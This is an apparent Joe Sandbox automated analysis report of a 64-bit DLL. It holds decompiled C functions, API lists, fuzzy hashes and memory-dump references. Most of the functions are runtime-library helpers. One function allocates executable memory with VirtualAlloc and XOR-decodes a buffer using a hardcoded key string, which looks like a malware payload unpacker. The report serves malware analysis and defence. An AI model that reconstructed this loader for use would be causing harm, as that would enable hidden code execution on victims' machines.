                                                                                                        0x7ffc289027f9
                                                                                                        0x7ffc28902806
                                                                                                        0x7ffc28902810
                                                                                                        0x7ffc2890282f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890283E
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC2890284B
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890274B
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC2890275B
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28902784
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289027AB
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289027E4
                                                                                                        • construct.LIBCPMTD ref: 00007FFC289027F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 3284725307-0
                                                                                                        • Opcode ID: d9377374bb8acdff986d08050f48ac2bf9a2668c8ad2a48d0c73f653525763d1
                                                                                                        • Instruction ID: 10d1402b11f9a49ac1a16e41d57aaceb0cd5ac246c02fae63d94712b06c4edd1
                                                                                                        • Opcode Fuzzy Hash: d9377374bb8acdff986d08050f48ac2bf9a2668c8ad2a48d0c73f653525763d1
                                                                                                        • Instruction Fuzzy Hash: FC510F2261DB9985DA61EB51FC5137AA3A1FBC9B81F500136EACD87B9ACF3DD400CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28901910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t32;
                                                                                                        				intOrPtr* _t47;
                                                                                                        				long long* _t49;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((_a16 & 0x000000ff) != 0) goto 0x28901930;
                                                                                                        				goto 0x289019f1;
                                                                                                        				E00007FFC7FFC28902150(__rax, _a8);
                                                                                                        				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x289019f1;
                                                                                                        				E00007FFC7FFC28902190(_a8);
                                                                                                        				_t47 =  *((intOrPtr*)(__rax));
                                                                                                        				_v40 = _t47;
                                                                                                        				E00007FFC7FFC28902BC0(E00007FFC7FFC28902190(_a8), _t47);
                                                                                                        				_v32 = _t47;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				_t32 = E00007FFC7FFC28902BD0(_t47, _v32);
                                                                                                        				if (_a24 <= 0) goto 0x289019bd;
                                                                                                        				E00007FFC7FFC28902C00(_t32, _v40);
                                                                                                        				_v24 = _t47;
                                                                                                        				E00007FFC7FFC28902190(_a8);
                                                                                                        				E00007FFC7FFC289011E0(_t47, _v24, _a24);
                                                                                                        				E00007FFC7FFC28902150(_t47, _a8);
                                                                                                        				_t49 =  *_t47 + 1;
                                                                                                        				_v16 = _t49;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				E00007FFC7FFC28902100(_t49, _v40, _v16); // executed
                                                                                                        				E00007FFC7FFC28902150(_t49, _a8);
                                                                                                        				 *_t49 = 0xf;
                                                                                                        				return E00007FFC7FFC289023A0(_t49, _a8, _a24);
                                                                                                        			}










                                                                                                        0x7ffc28901910
                                                                                                        0x7ffc28901915
                                                                                                        0x7ffc28901919
                                                                                                        0x7ffc28901929
                                                                                                        0x7ffc2890192b
                                                                                                        0x7ffc28901935
                                                                                                        0x7ffc2890193e
                                                                                                        0x7ffc28901949
                                                                                                        0x7ffc2890194e
                                                                                                        0x7ffc28901951
                                                                                                        0x7ffc28901963
                                                                                                        0x7ffc28901968
                                                                                                        0x7ffc28901972
                                                                                                        0x7ffc28901982
                                                                                                        0x7ffc2890198d
                                                                                                        0x7ffc28901994
                                                                                                        0x7ffc28901999
                                                                                                        0x7ffc289019a3
                                                                                                        0x7ffc289019b8
                                                                                                        0x7ffc289019c2
                                                                                                        0x7ffc289019ca
                                                                                                        0x7ffc289019cd
                                                                                                        0x7ffc289019d7
                                                                                                        0x7ffc289019ec
                                                                                                        0x7ffc289019f6
                                                                                                        0x7ffc289019fb
                                                                                                        0x7ffc28901a15

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 2899389904-0
                                                                                                        • Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction ID: 329217ae5c6157f03290426eaf2cb4da1b15e74a104300142ca02dfe3952ddf0
                                                                                                        • Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction Fuzzy Hash: BD21E322A1CA9581DA51FB92FC5127EA3A0FBC9BD1F000036FA8D87796CE6DD440CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00007FFC7FFC289013A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
                                                                                                        				void* _v16;
                                                                                                        				signed long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				signed int _v40;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if (_a16 - 0xffffffff <= 0) goto 0x289013cd;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_v24 = _a16 * _a24;
                                                                                                        				if (_v24 - 0x1000 < 0) goto 0x28901475;
                                                                                                        				_v40 = _a8;
                                                                                                        				if ((_v40 & 0x0000001f) == 0) goto 0x28901409;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_v16 = _v40 - 8;
                                                                                                        				_v32 =  *_v16;
                                                                                                        				if (_v32 - _v40 < 0) goto 0x28901435;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				if (_v40 - _v32 - 8 >= 0) goto 0x28901450;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				if (_v40 - _v32 - 0x27 <= 0) goto 0x2890146b;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_a8 = _v32;
                                                                                                        				0x28904184(); // executed
                                                                                                        				return __eax / _a24;
                                                                                                        			}







                                                                                                        0x7ffc289013a0
                                                                                                        0x7ffc289013a5
                                                                                                        0x7ffc289013aa
                                                                                                        0x7ffc289013c6
                                                                                                        0x7ffc289013c8
                                                                                                        0x7ffc289013d8
                                                                                                        0x7ffc289013e6
                                                                                                        0x7ffc289013f1
                                                                                                        0x7ffc28901402
                                                                                                        0x7ffc28901404
                                                                                                        0x7ffc28901412
                                                                                                        0x7ffc2890141f
                                                                                                        0x7ffc2890142e
                                                                                                        0x7ffc28901430
                                                                                                        0x7ffc28901449
                                                                                                        0x7ffc2890144b
                                                                                                        0x7ffc28901464
                                                                                                        0x7ffc28901466
                                                                                                        0x7ffc28901470
                                                                                                        0x7ffc2890147a
                                                                                                        0x7ffc28901483

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                        • String ID:
                                                                                                        • API String ID: 3668304517-0
                                                                                                        • Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction ID: 1d9f8d91d4260cbad3e29dafb939fed429b928be601c1548aae89f777ce951fd
                                                                                                        • Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction Fuzzy Hash: 60213E26618B9885DA50EB59E88021EB3A4F788BA5F000636FADD47BF9DF3CD140CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28919510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				signed int _t35;
                                                                                                        				signed int _t48;
                                                                                                        				long long _t63;
                                                                                                        				intOrPtr _t64;
                                                                                                        				void* _t66;
                                                                                                        				void* _t76;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0;
                                                                                                        				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
                                                                                                        				_v16 = _t63;
                                                                                                        				_v32 = E00007FFC7FFC289091B8(_t63, _t66, L"64", _t76, _t77);
                                                                                                        				_v36 = E00007FFC7FFC289091B8(_t63, _t66, L"4096", _t76, _t77);
                                                                                                        				_t35 = E00007FFC7FFC289091B8(_t63, _t66, L"8192", _t76, _t77);
                                                                                                        				r9d = _v32;
                                                                                                        				r8d = _v36 | _t35;
                                                                                                        				VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                        				_v24 = _t63;
                                                                                                        				if (_v24 != 0) goto 0x2891958f;
                                                                                                        				goto 0x289195f4;
                                                                                                        				_v40 = 0;
                                                                                                        				goto 0x289195a3;
                                                                                                        				_v40 = _v40 + 1;
                                                                                                        				if (_v40 - _a16 >= 0) goto 0x289195ef;
                                                                                                        				_t64 = _v40;
                                                                                                        				_v28 =  *(_a8 + _t64) & 0x000000ff;
                                                                                                        				asm("cdq");
                                                                                                        				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
                                                                                                        				 *(_v24 + _v40) = _t48;
                                                                                                        				goto 0x28919599;
                                                                                                        				return _t48;
                                                                                                        			}
















                                                                                                        0x7ffc28919510
                                                                                                        0x7ffc28919514
                                                                                                        0x7ffc2891951d
                                                                                                        0x7ffc28919526
                                                                                                        0x7ffc2891952d
                                                                                                        0x7ffc2891953e
                                                                                                        0x7ffc2891954e
                                                                                                        0x7ffc28919559
                                                                                                        0x7ffc2891956e
                                                                                                        0x7ffc28919571
                                                                                                        0x7ffc28919578
                                                                                                        0x7ffc2891957e
                                                                                                        0x7ffc28919589
                                                                                                        0x7ffc2891958d
                                                                                                        0x7ffc2891958f
                                                                                                        0x7ffc28919597
                                                                                                        0x7ffc2891959f
                                                                                                        0x7ffc289195ab
                                                                                                        0x7ffc289195ad
                                                                                                        0x7ffc289195bb
                                                                                                        0x7ffc289195c3
                                                                                                        0x7ffc289195de
                                                                                                        0x7ffc289195ea
                                                                                                        0x7ffc289195ed
                                                                                                        0x7ffc289195f8

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
                                                                                                        • API String ID: 4275171209-3063897839
                                                                                                        • Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction ID: 94020e8fa75c7423dc89a43cac493a4b34a3a7091bfeb4659a2634c9dafefd4c
                                                                                                        • Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction Fuzzy Hash: 9321293261C6958AD764DB18E89022AB7A1F7C8746F40023AF68EC3B98DF7CD540CF18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC289012B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed long long _v32;
                                                                                                        				signed long long _v40;
                                                                                                        				void* _t40;
                                                                                                        				long long _t54;
                                                                                                        				signed long long _t57;
                                                                                                        				signed long long _t58;
                                                                                                        				void* _t60;
                                                                                                        
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v40 = 0;
                                                                                                        				if (_a8 != 0) goto 0x289012de;
                                                                                                        				goto 0x28901397;
                                                                                                        				_t42 = __eax % _a16;
                                                                                                        				if (0xffffffff - _a8 >= 0) goto 0x289012f8;
                                                                                                        				E00007FFC7FFC28904E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
                                                                                                        				_v32 = _a8 * _a16;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x2890137c;
                                                                                                        				if (_v32 - 0x1000 < 0) goto 0x2890137c;
                                                                                                        				_v24 = _v32 + 0x27;
                                                                                                        				_t54 = _v32;
                                                                                                        				if (_v24 - _t54 > 0) goto 0x2890133b;
                                                                                                        				E00007FFC7FFC28904E7C(_t42, _v24 - _t54, _t54, _t60);
                                                                                                        				E00007FFC7FFC28903D6C(_t54, _v24); // executed
                                                                                                        				_v16 = _t54;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_t57 = _v16 + 0x00000027 & 0xffffffe0;
                                                                                                        				_v40 = _t57;
                                                                                                        				_t58 = _t57 * 0xffffffff;
                                                                                                        				 *((long long*)(_v40 + _t58)) = _v16;
                                                                                                        				goto 0x28901392;
                                                                                                        				_t40 = E00007FFC7FFC28903D6C(_t58, _v32);
                                                                                                        				_v40 = _t58;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				return _t40;
                                                                                                        			}












                                                                                                        0x7ffc289012b0
                                                                                                        0x7ffc289012b5
                                                                                                        0x7ffc289012ba
                                                                                                        0x7ffc289012c3
                                                                                                        0x7ffc289012d2
                                                                                                        0x7ffc289012d9
                                                                                                        0x7ffc289012e7
                                                                                                        0x7ffc289012f1
                                                                                                        0x7ffc289012f3
                                                                                                        0x7ffc28901303
                                                                                                        0x7ffc2890130f
                                                                                                        0x7ffc2890131a
                                                                                                        0x7ffc28901325
                                                                                                        0x7ffc2890132a
                                                                                                        0x7ffc28901334
                                                                                                        0x7ffc28901336
                                                                                                        0x7ffc28901340
                                                                                                        0x7ffc28901345
                                                                                                        0x7ffc2890134c
                                                                                                        0x7ffc2890135a
                                                                                                        0x7ffc2890135e
                                                                                                        0x7ffc28901368
                                                                                                        0x7ffc28901376
                                                                                                        0x7ffc2890137a
                                                                                                        0x7ffc28901381
                                                                                                        0x7ffc28901386
                                                                                                        0x7ffc2890138d
                                                                                                        0x7ffc2890139b

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction ID: cf436524c6cc56255e73c7e407988f91b1b3a7c36f441fad3a82d06147a7d058
                                                                                                        • Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction Fuzzy Hash: B621212251CB9981D6609B19E84032EB7A4FB887A5F044336F6ED46BE8DF7DD190CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00007FFC7FFC28902970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed int _v16;
                                                                                                        				char _v48;
                                                                                                        				long long _v56;
                                                                                                        				signed long long _v64;
                                                                                                        				signed int _v72;
                                                                                                        				void* _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t39;
                                                                                                        				signed long long _t40;
                                                                                                        				signed long long _t61;
                                                                                                        
                                                                                                        				_t37 = __eflags;
                                                                                                        				_t36 = __edx;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v56 = 0xfffffffe;
                                                                                                        				_t39 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				_t40 = _t39 ^ _t61;
                                                                                                        				_v16 = _t40;
                                                                                                        				_v72 = 0;
                                                                                                        				E00007FFC7FFC28901760(__edx,  &_v48);
                                                                                                        				E00007FFC7FFC28901490(_t40, _a16);
                                                                                                        				_v64 = _t40;
                                                                                                        				E00007FFC7FFC289011A0(_a24);
                                                                                                        				E00007FFC7FFC28902CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
                                                                                                        				E00007FFC7FFC28902E90( &_v48, _a16);
                                                                                                        				E00007FFC7FFC28902E60( &_v48, _a24);
                                                                                                        				E00007FFC7FFC289016A0(__edx, _v64 + _t40, _a8,  &_v48);
                                                                                                        				_v72 = _v72 | 0x00000001;
                                                                                                        				return E00007FFC7FFC28903A70(E00007FFC7FFC28901540( &_v48), _t35, _t36, _v16 ^ _t61);
                                                                                                        			}













                                                                                                        0x7ffc28902970
                                                                                                        0x7ffc28902970
                                                                                                        0x7ffc28902970
                                                                                                        0x7ffc28902975
                                                                                                        0x7ffc2890297a
                                                                                                        0x7ffc28902983
                                                                                                        0x7ffc2890298c
                                                                                                        0x7ffc28902993
                                                                                                        0x7ffc28902996
                                                                                                        0x7ffc2890299b
                                                                                                        0x7ffc289029a8
                                                                                                        0x7ffc289029b3
                                                                                                        0x7ffc289029b8
                                                                                                        0x7ffc289029c5
                                                                                                        0x7ffc289029dd
                                                                                                        0x7ffc289029ec
                                                                                                        0x7ffc289029fe
                                                                                                        0x7ffc28902a0d
                                                                                                        0x7ffc28902a19
                                                                                                        0x7ffc28902a3d

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289029C5
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC289029EC
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC289029FE
                                                                                                          • Part of subcall function 00007FFC289016A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289016BC
                                                                                                          • Part of subcall function 00007FFC28901540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC28901567
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 652137993-0
                                                                                                        • Opcode ID: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
                                                                                                        • Instruction ID: 44adac28b97c9b0dc2a3eaf6598590973b3e8fcf4a62f0c92100f594847877cb
                                                                                                        • Opcode Fuzzy Hash: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
                                                                                                        • Instruction Fuzzy Hash: 40110B6261CA8581DA50EB14EC9116AB7A0FBC47D4F501222F6CE47AE9DF2CD145CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28901B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed char _t23;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC28902250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x28901b97;
                                                                                                        				E00007FFC7FFC289018F0(__rax, _a8);
                                                                                                        				E00007FFC7FFC28901BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
                                                                                                        				goto 0x28901be0;
                                                                                                        				r8d = 0;
                                                                                                        				_t23 = E00007FFC7FFC289022B0(_t31, _a8, _a24); // executed
                                                                                                        				if ((_t23 & 0x000000ff) == 0) goto 0x28901bdb;
                                                                                                        				E00007FFC7FFC289018F0(_t31, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_t31, _a16, _a24);
                                                                                                        				return E00007FFC7FFC289023A0(_t31, _a8, _a24);
                                                                                                        			}




                                                                                                        0x7ffc28901b40
                                                                                                        0x7ffc28901b45
                                                                                                        0x7ffc28901b4a
                                                                                                        0x7ffc28901b67
                                                                                                        0x7ffc28901b6e
                                                                                                        0x7ffc28901b90
                                                                                                        0x7ffc28901b95
                                                                                                        0x7ffc28901b97
                                                                                                        0x7ffc28901ba4
                                                                                                        0x7ffc28901bae
                                                                                                        0x7ffc28901bb5
                                                                                                        0x7ffc28901bc7
                                                                                                        0x7ffc28901be4

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890226B
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901B6E
                                                                                                          • Part of subcall function 00007FFC289018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289018FE
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901BB5
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901BC7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 872432861-0
                                                                                                        • Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction ID: 03d1e4ba3ecae547987de0530c9fb71d60a91af2c73047a2091c0f7d1850ed76
                                                                                                        • Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
